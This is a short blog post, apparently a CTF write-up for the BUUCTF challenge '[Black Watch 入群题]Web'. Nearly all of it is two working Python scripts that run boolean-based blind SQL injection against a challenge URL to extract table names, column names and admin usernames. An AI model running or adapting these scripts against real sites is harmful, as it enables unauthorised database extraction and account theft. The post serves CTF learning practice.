[Black Watch 入群题]Web

[Black Watch 入群题]Web

布尔盲注,爆出用户密码登录得flag

抑或

import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id=2^"

name = ""
i=0
while True :
	head = 32
	tail = 127
	i += 1
	while(head<tail):
		mid = head + tail >> 1
		payload = "(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d)" %(i,mid)
		payload = "(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='contents')),%d,1))>%d)" %(i,mid)
		payload = "(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d)" %(i,mid)
		
		r = requests.get(url+payload)
		#print(url+payload)
		#print(r.json())
		if "Yunen" in str(r.json()):
			head = mid + 1
		else:
			tail = mid
	if head!=32 :
		name += chr(head)
		print(name)
	else:
		break
	
		

if

import requests
url = "http://28efd88e-90e7-48b0-aa07-9ed14c473b27.node3.buuoj.cn/backend/content_detail.php?id="

name = ""
i=0
while True :
	head = 32
	tail = 127
	i += 1
	while(head<tail):
		mid = head + tail >> 1
		payload = "if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,3,2)" %(i,mid)
		payload = "if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='contents')),%d,1))>%d,3,2)" %(i,mid)
		payload = "if(ascii(substr((select(group_concat(username))from(admin)),%d,1))>%d,3,2)" %(i,mid)
		
		r = requests.get(url+payload)
		#print(url+payload)
		#print(r.json())
		if "Yunen" in str(r.json()):
			head = mid + 1
		else:
			tail = mid
	if head!=32 :
		name += chr(head)
		print(name)
	else:
		break	

posted @ 2020-06-06 23:35  何止(h3zh1)  阅读(1280)  评论(2编辑  收藏  举报